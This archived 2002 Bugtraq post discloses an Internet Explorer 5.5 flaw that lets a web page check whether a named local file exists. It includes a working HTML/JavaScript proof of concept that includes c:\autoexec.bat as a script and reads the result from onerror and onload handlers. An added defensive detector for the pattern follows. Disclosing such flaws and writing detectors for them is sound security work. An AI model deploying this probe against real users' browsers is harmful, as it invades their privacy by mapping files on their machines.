Bugtraq mailing list archives

Serious IE privacy issues


From: Tom Micklovitch <h_bugtraq () yahoo com>
Date: Thu, 3 Jan 2002 04:08:31 -0800 (PST)

In addition to "Minor IE System Info Disclosure"
(Nov 4 2001) I've found that you can further poll
a system for ANY file, provided you know its
path. Use the following script:

<html>
<head>
<script language="javascript">
<!--
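var fileExists = false;

// Runs when the included file exists but is not valid script
function yes()
{
        alert("the file exists.");
        fileExists = true; // record the hit so no() stays silent
}

// Runs on load; reports a miss only if the error handler never ran
function no()
{
        if(!fileExists)
        {
                alert("the file does not exist.");
        }
}

window.onerror = yes;
window.onload = no;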
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

This will cause an alert "yes" if it exists, and
alert "no" if not.

The reason is that autoexec.bat does not
contain any valid javascript commands, so the
onerror event is fired. Any non-existent file
will not generate an error, so the onload event
fires.

Tested with IE5.5

Still could do with some tweaking.

-User24 (freetimers.com)
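
A defensive triage check for the pattern in the post, as an added example that is not part of the original message: it flags HTML that pairs a script include pointing at a local path with an onerror/onload handler. The function names and both sample pages are constructed for illustration.

```javascript
// Added example: flag HTML that uses a local-file script include as an
// existence oracle. Regex-based, so it is a triage heuristic, not a parser.

// Matches file: URLs, drive-letter paths (c:\ or c:/) and UNC paths.
const LOCAL_REF = /^\s*(file:|[a-z]:[\\/]|\\\\)/i;

// Collect src values from <script ...> tags, tolerating attributes split
// across lines and double, single or missing quotes.
function scriptSources(html) {
  const out = [];
  const tagRe = /<script\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    if (src) out.push(src[1] ?? src[2] ?? src[3]);
  }
  return out;
}

function findLocalFileProbes(html) {
  const localSrcs = scriptSources(html).filter((s) => LOCAL_REF.test(s));
  // An error or load handler is what turns the include into a yes/no signal.
  const hasHandler = /\bon(error|load)\s*=/i.test(html);
  return { localSrcs, hasHandler, suspicious: localSrcs.length > 0 && hasHandler };
}

// Constructed samples: the first mirrors the page in the post, the second
// is a benign page with a remote script and an onload handler.
const SAMPLE_PROBE = [
  '<html><head><script language="javascript">',
  'window.onerror = yes',
  'window.onload = no',
  '</script>',
  '<script language="javascript"',
  'src="file://c:\\autoexec.bat"></script>',
  '</head></html>',
].join("\n");
const SAMPLE_BENIGN =
  '<html><head><script src="https://example.com/app.js"></script></head>' +
  '<body onload="init()"></body></html>';

console.log(findLocalFileProbes(SAMPLE_PROBE), findLocalFileProbes(SAMPLE_BENIGN));
```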
